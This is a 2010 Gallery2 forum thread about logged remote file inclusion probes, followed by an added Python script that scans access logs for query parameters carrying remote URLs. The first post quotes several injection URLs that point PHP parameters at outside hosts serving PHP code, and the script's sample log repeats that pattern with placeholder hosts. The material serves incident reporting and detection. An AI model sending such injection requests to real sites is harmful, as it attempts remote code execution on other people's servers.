Exploit? PHP File injection? Suspicious URLs to my gallery2.3.1 Update: Gallery2 secure!

Asspalmer

Joined: 2005-10-12
Posts: 3
Posted: Thu, 2010-01-28 22:13

I keep seeing people hit my installation with URLs like this.

http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html%20%20/index.php&g=http://188.165.37.25/Nea/ftp/FxID1.txt??
http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html//errors.php&error=http://www.anabolex.com/gallery/uploads/16570/hosting/a??
http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html/index.php&g=http://188.165.37.25/Nea/ftp/FxID1.txt??
http://mysite.c0m/gallery/main.php?g2_path=/index.php//index.php&mosConfig_absolute_path=http://www.focusi.net/bbs/data/board_free/satu.txt??
http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html%20%20////&_SERVER[DOCUMENT_ROOT]=http://julie.pwo.ca/idxx.txt???
(don't click, this isn't my actual site)

They show up in my Gallery2 log with the error "Error (ERROR_MISSING_OBJECT)"

I look at these sites it's appending to the URL and it's a text file with some PHP in it; seems like some kind of PHP injection attack. Is my site vulnerable? I was running 2.3 and the site was broken, though it worked the other day, so I updated to 2.3.1 and now I am back up, but I am just wondering if this is a known exploit or if it's old and fixed in 2.3.1.

edit: OH! I only discovered this because Google sent me an email saying my site was compromised, however the "malware" links they provided and claimed I was hosting did not exist on my server so I am kind of confused why I got that.

bharat

Joined: 2002-05-21
Posts: 6329
Posted: Fri, 2010-01-29 01:11

It looks to me like a fishing attempt to try to find a vulnerability. We're always interested in possible security vulnerabilities, though, so if you can email the details to

we'll be happy to investigate and see if we can figure out what's going on.
---
Problems? Check gallery3/var/logs
bugs/feature req's | upgrade to the latest code | use git

Asspalmer

Joined: 2005-10-12
Posts: 3
Posted: Fri, 2010-01-29 02:09

OK will do. My site is getting hammered with those types of requests literally every minute or so, so something is going on.

bharat

Joined: 2002-05-21
Posts: 6329
Posted: Fri, 2010-01-29 17:44

Followup: We talked offline and looked at the traffic and believe that this is an automated attack that is not turning up a vulnerability in Gallery2.

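Added example, not part of the original thread or of Gallery2's code: a log triage script that flags requests like the ones quoted in the first post, where a query parameter's decoded value is an absolute remote URL, and counts them per client. The log lines, hosts, IPs and status codes are constructed placeholders, and the combined access-log format is an assumption.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed access-log lines (combined format); hosts and IPs are documentation placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [28/Jan/2010:22:01:10 +0000] "GET /gallery/main.php?g2_path=index_php.jpg.html%20%20/index.php&g=http://remote.example.net/a.txt?? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
198.51.100.7 - - [28/Jan/2010:22:02:11 +0000] "GET /gallery/main.php?g2_path=/index.php//index.php&mosConfig_absolute_path=http://remote.example.net/b.txt?? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
203.0.113.40 - - [28/Jan/2010:22:03:12 +0000] "GET /gallery/main.php?g2_path=x////&_SERVER[DOCUMENT_ROOT]=http%3A%2F%2Fremote.example.org/c.txt??? HTTP/1.1" 404 512 "-" "-"
192.0.2.15 - - [28/Jan/2010:22:04:00 +0000] "GET /gallery/main.php?g2_itemId=42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.0.2.15 - - [28/Jan/2010:22:04:05 +0000] "GET /gallery/main.php?g2_view=core.ShowItem&g2_return=/gallery/main.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

# client IP, method, request target, response status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# A parameter value that starts with a remote scheme after URL-decoding
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.I)


def remote_url_params(request_target):
    """Return (name, value) pairs whose decoded value is an absolute URL."""
    _, _, query = request_target.partition("?")
    pairs = parse_qsl(query, keep_blank_values=True)  # percent-decodes names and values
    return [(name, value) for name, value in pairs if REMOTE_RE.match(value)]


def scan(log_text):
    """Return (findings, hits per client IP) for remote-URL parameter probes."""
    findings, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, _method, target, status = m.groups()
        for name, value in remote_url_params(target):
            findings.append({"ip": ip, "param": name, "value": value,
                             "status": int(status)})
            per_ip[ip] += 1
    return findings, per_ip


if __name__ == "__main__":
    hits, counts = scan(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ip"]} {h["status"]} {h["param"]} -> {h["value"]}')
    print(counts.most_common())
```

Parameter names such as `mosConfig_absolute_path` that the application never defines, arriving in bulk from a few clients, match the automated-scan conclusion above; a hit that returned 200 with an unusual response size is the one worth a closer look.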